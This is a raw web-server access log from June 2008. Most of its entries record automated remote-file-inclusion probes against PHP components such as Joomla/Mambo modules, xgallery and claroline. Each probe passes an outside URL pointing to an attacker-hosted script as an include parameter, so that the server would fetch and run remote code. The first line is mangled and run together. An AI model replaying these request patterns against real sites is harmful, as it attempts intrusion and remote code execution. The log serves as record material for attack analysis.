212.34.134.83 - - [11/Jun/2008:10:16:55 -0700] "GET /logs/access_071215.log%3C/span%3E%20-%20%3Cem%3E125k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.dmulk.com/logs/access_071215.log&w=oneadmin+site+.cn&d=TOVOmZzfQz_b&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.horizonti.com/data.txt%22%20%3Ewww.horizonti.com/data.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20http:/www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?%20...%20http:/2007.cultuurmarathon.nl/site/components/com_web/test.txt?%20...%3C/div%3E%3Cspan%20class=url%3Ewww.horizonti.com/data.txt%3C/span%3E%20-%20%3Cem%3E547k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.horizonti.com/shunyi.yao/us2:58.38.67.212.34.134.83 - - [11/Jun/2008:10:16:55 -0700] "GET /logs/access_071215.log%3C/span%3E%20-%20%3Cem%3E125k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.dmulk.com/logs/access_071215.log&w=oneadmin+site+.cn&d=TOVOmZzfQz_b&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.horizonti.com/data.txt%22%20%3Ewww.horizonti.com/data.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20http:/www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?%20...%20http:/2007.cultuurmarathon.nl/site/components/com_web/test.txt?%20...%3C/div%3E%3Cspan%20class=url%3Ewww.horizonti.com/data.txt%3C/span%3E%20-%20%3Cem%3E547k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.horizonti.com/dubroom/us1:64.15.69.3 -213.215.67.3 - - [11/Jun/2008:10:17:06 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:17:06 -0700] "GET /logs/access_080312.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:10:17:09 -0700] "GET //lostpasswd.php?env[include_prefix]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:17:10 -0700] "GET /logs/access_080131.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:17:10 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:17:13 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:17:19 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:17:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:17:27 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:17:32 -0700] "GET /logs/access_080219.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:17:43 -0700] "GET /logs/access_080119.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [11/Jun/2008:10:18:04 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.56.55.6 - - [11/Jun/2008:10:18:16 -0700] "GET /logs/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://www.casamob.ro/media/force/spread.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
195.56.55.6 - - [11/Jun/2008:10:18:16 -0700] "GET /logs/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://www.casamob.ro/media/force/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
195.56.55.6 - - [11/Jun/2008:10:18:20 -0700] "GET /index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://www.casamob.ro/media/force/test.txt??? HTTP/1.1" 200 18533 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
195.56.55.6 - - [11/Jun/2008:10:18:20 -0700] "GET /index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://www.casamob.ro/media/force/spread.txt?? HTTP/1.1" 200 18531 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
65.55.211.25 - - [11/Jun/2008:10:18:46 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.25 - - [11/Jun/2008:10:18:46 -0700] "GET /bikes/CreSTOC07/?M=D HTTP/1.1" 200 15296 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.3.229.166 - - [11/Jun/2008:10:19:20 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config%5Broot_dir%5D=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.28.7.24 - - [11/Jun/2008:10:19:40 -0700] "GET //skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:10:19:49 -0700] "GET /logs/access_080101.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://alb1.freehostia.com/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:10:19:52 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:10:19:53 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:10:20:07 -0700] "GET /logs/access_080322.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:20:14 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:20:14 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:20:53 -0700] "GET //claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:20:57 -0700] "GET //claroline/inc/lib/event/init_event_manager.inc.php?includePath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:21:19 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:21:20 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:10:21:21 -0700] "GET /logs/access_080429.log//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:21:22 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.189 - - [11/Jun/2008:10:21:37 -0700] "GET /logs/access_070913.log HTTP/1.0" 200 105654 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:21:51 -0700] "GET /logs/access_080102.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:21:51 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:21:52 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:21:52 -0700] "GET /logs/access_080201.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:22:00 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:22:00 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:22:21 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:10:22:28 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:10:22:34 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.76.110 - - [11/Jun/2008:10:22:45 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.76.110 - - [11/Jun/2008:10:22:46 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:23:07 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:23:07 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:10:24:11 -0700] "GET /blog/?nggpage=2&pageid=17&show=gallery HTTP/1.1" 200 54419 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
87.106.101.24 - - [11/Jun/2008:10:24:14 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:10:24:14 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:10:24:40 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:10:25:08 -0700] "GET /logs/access_080108.log/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.73 - - [11/Jun/2008:10:25:11 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [11/Jun/2008:10:25:20 -0700] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [11/Jun/2008:10:25:20 -0700] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:25:40 -0700] "GET //claroline/inc/lib/event/init_event_manager.inc.php?includePath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:25:45 -0700] "GET //claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.73 - - [11/Jun/2008:10:26:04 -0700] "GET /logs/access_080429.log//lostpasswd.php?env[include_prefix]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.73 - - [11/Jun/2008:10:26:04 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.73 - - [11/Jun/2008:10:26:04 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.73 - - [11/Jun/2008:10:26:04 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.58.78.39 - - [11/Jun/2008:10:26:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.39 - - [11/Jun/2008:10:26:57 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
150.187.25.20 - - [11/Jun/2008:10:27:08 -0700] "GET /logs/access_080223.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [11/Jun/2008:10:27:08 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [11/Jun/2008:10:27:08 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
150.187.25.20 - - [11/Jun/2008:10:27:12 -0700] "GET /logs/access_080221.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.136.58.116 - - [11/Jun/2008:10:27:52 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.77.72 - - [11/Jun/2008:10:28:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.72 - - [11/Jun/2008:10:28:13 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:28:42 -0700] "GET /logs/access_080228.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:28:52 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:10:28:53 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.15.147.86 - - [11/Jun/2008:10:28:59 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:29:11 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:29:12 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:29:21 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:29:22 -0700] "GET /logs/access.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:29:22 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:29:22 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:29:23 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:29:23 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.185.237.149 - - [11/Jun/2008:10:29:49 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/vianarina/test.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.15.147.86 - - [11/Jun/2008:10:29:50 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:30:45 -0700] "GET /logs/access_080113.log//admin.php?include_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:30:45 -0700] "GET //admin.php?include_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:30:45 -0700] "GET /logs//admin.php?include_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:10:30:53 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:10:30:54 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:30:57 -0700] "GET /logs/access_080123.log//admin.php?include_path=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
82.77.11.177 - - [11/Jun/2008:10:31:47 -0700] "GET /logs/index.php3?p=http://nothacker.net78.net/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.11.177 - - [11/Jun/2008:10:31:48 -0700] "GET /index.php3?p=http://nothacker.net78.net/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.147.86 - - [11/Jun/2008:10:32:29 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.147.86 - - [11/Jun/2008:10:32:30 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.77.11.177 - - [11/Jun/2008:10:32:42 -0700] "GET /logs/index.php3?p=http://nothacker.net78.net/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.11.177 - - [11/Jun/2008:10:32:42 -0700] "GET /index.php3?p=http://nothacker.net78.net/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.64.234 - - [11/Jun/2008:10:33:01 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.64.234 - - [11/Jun/2008:10:33:04 -0700] "GET //appserv/main.php?appserv_root=http://www.allfreeipodsex.com/viagra.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.11.177 - - [11/Jun/2008:10:33:07 -0700] "GET /logs/index.php3?p=http://nothacker.net78.net/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.11.177 - - [11/Jun/2008:10:33:11 -0700] "GET /index.php3?p=http://nothacker.net78.net/KaBo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.111.11.7 - - [11/Jun/2008:10:33:32 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:10:34:06 -0700] "GET /index.php?command=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 200 18427 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:34:16 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:10:34:16 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
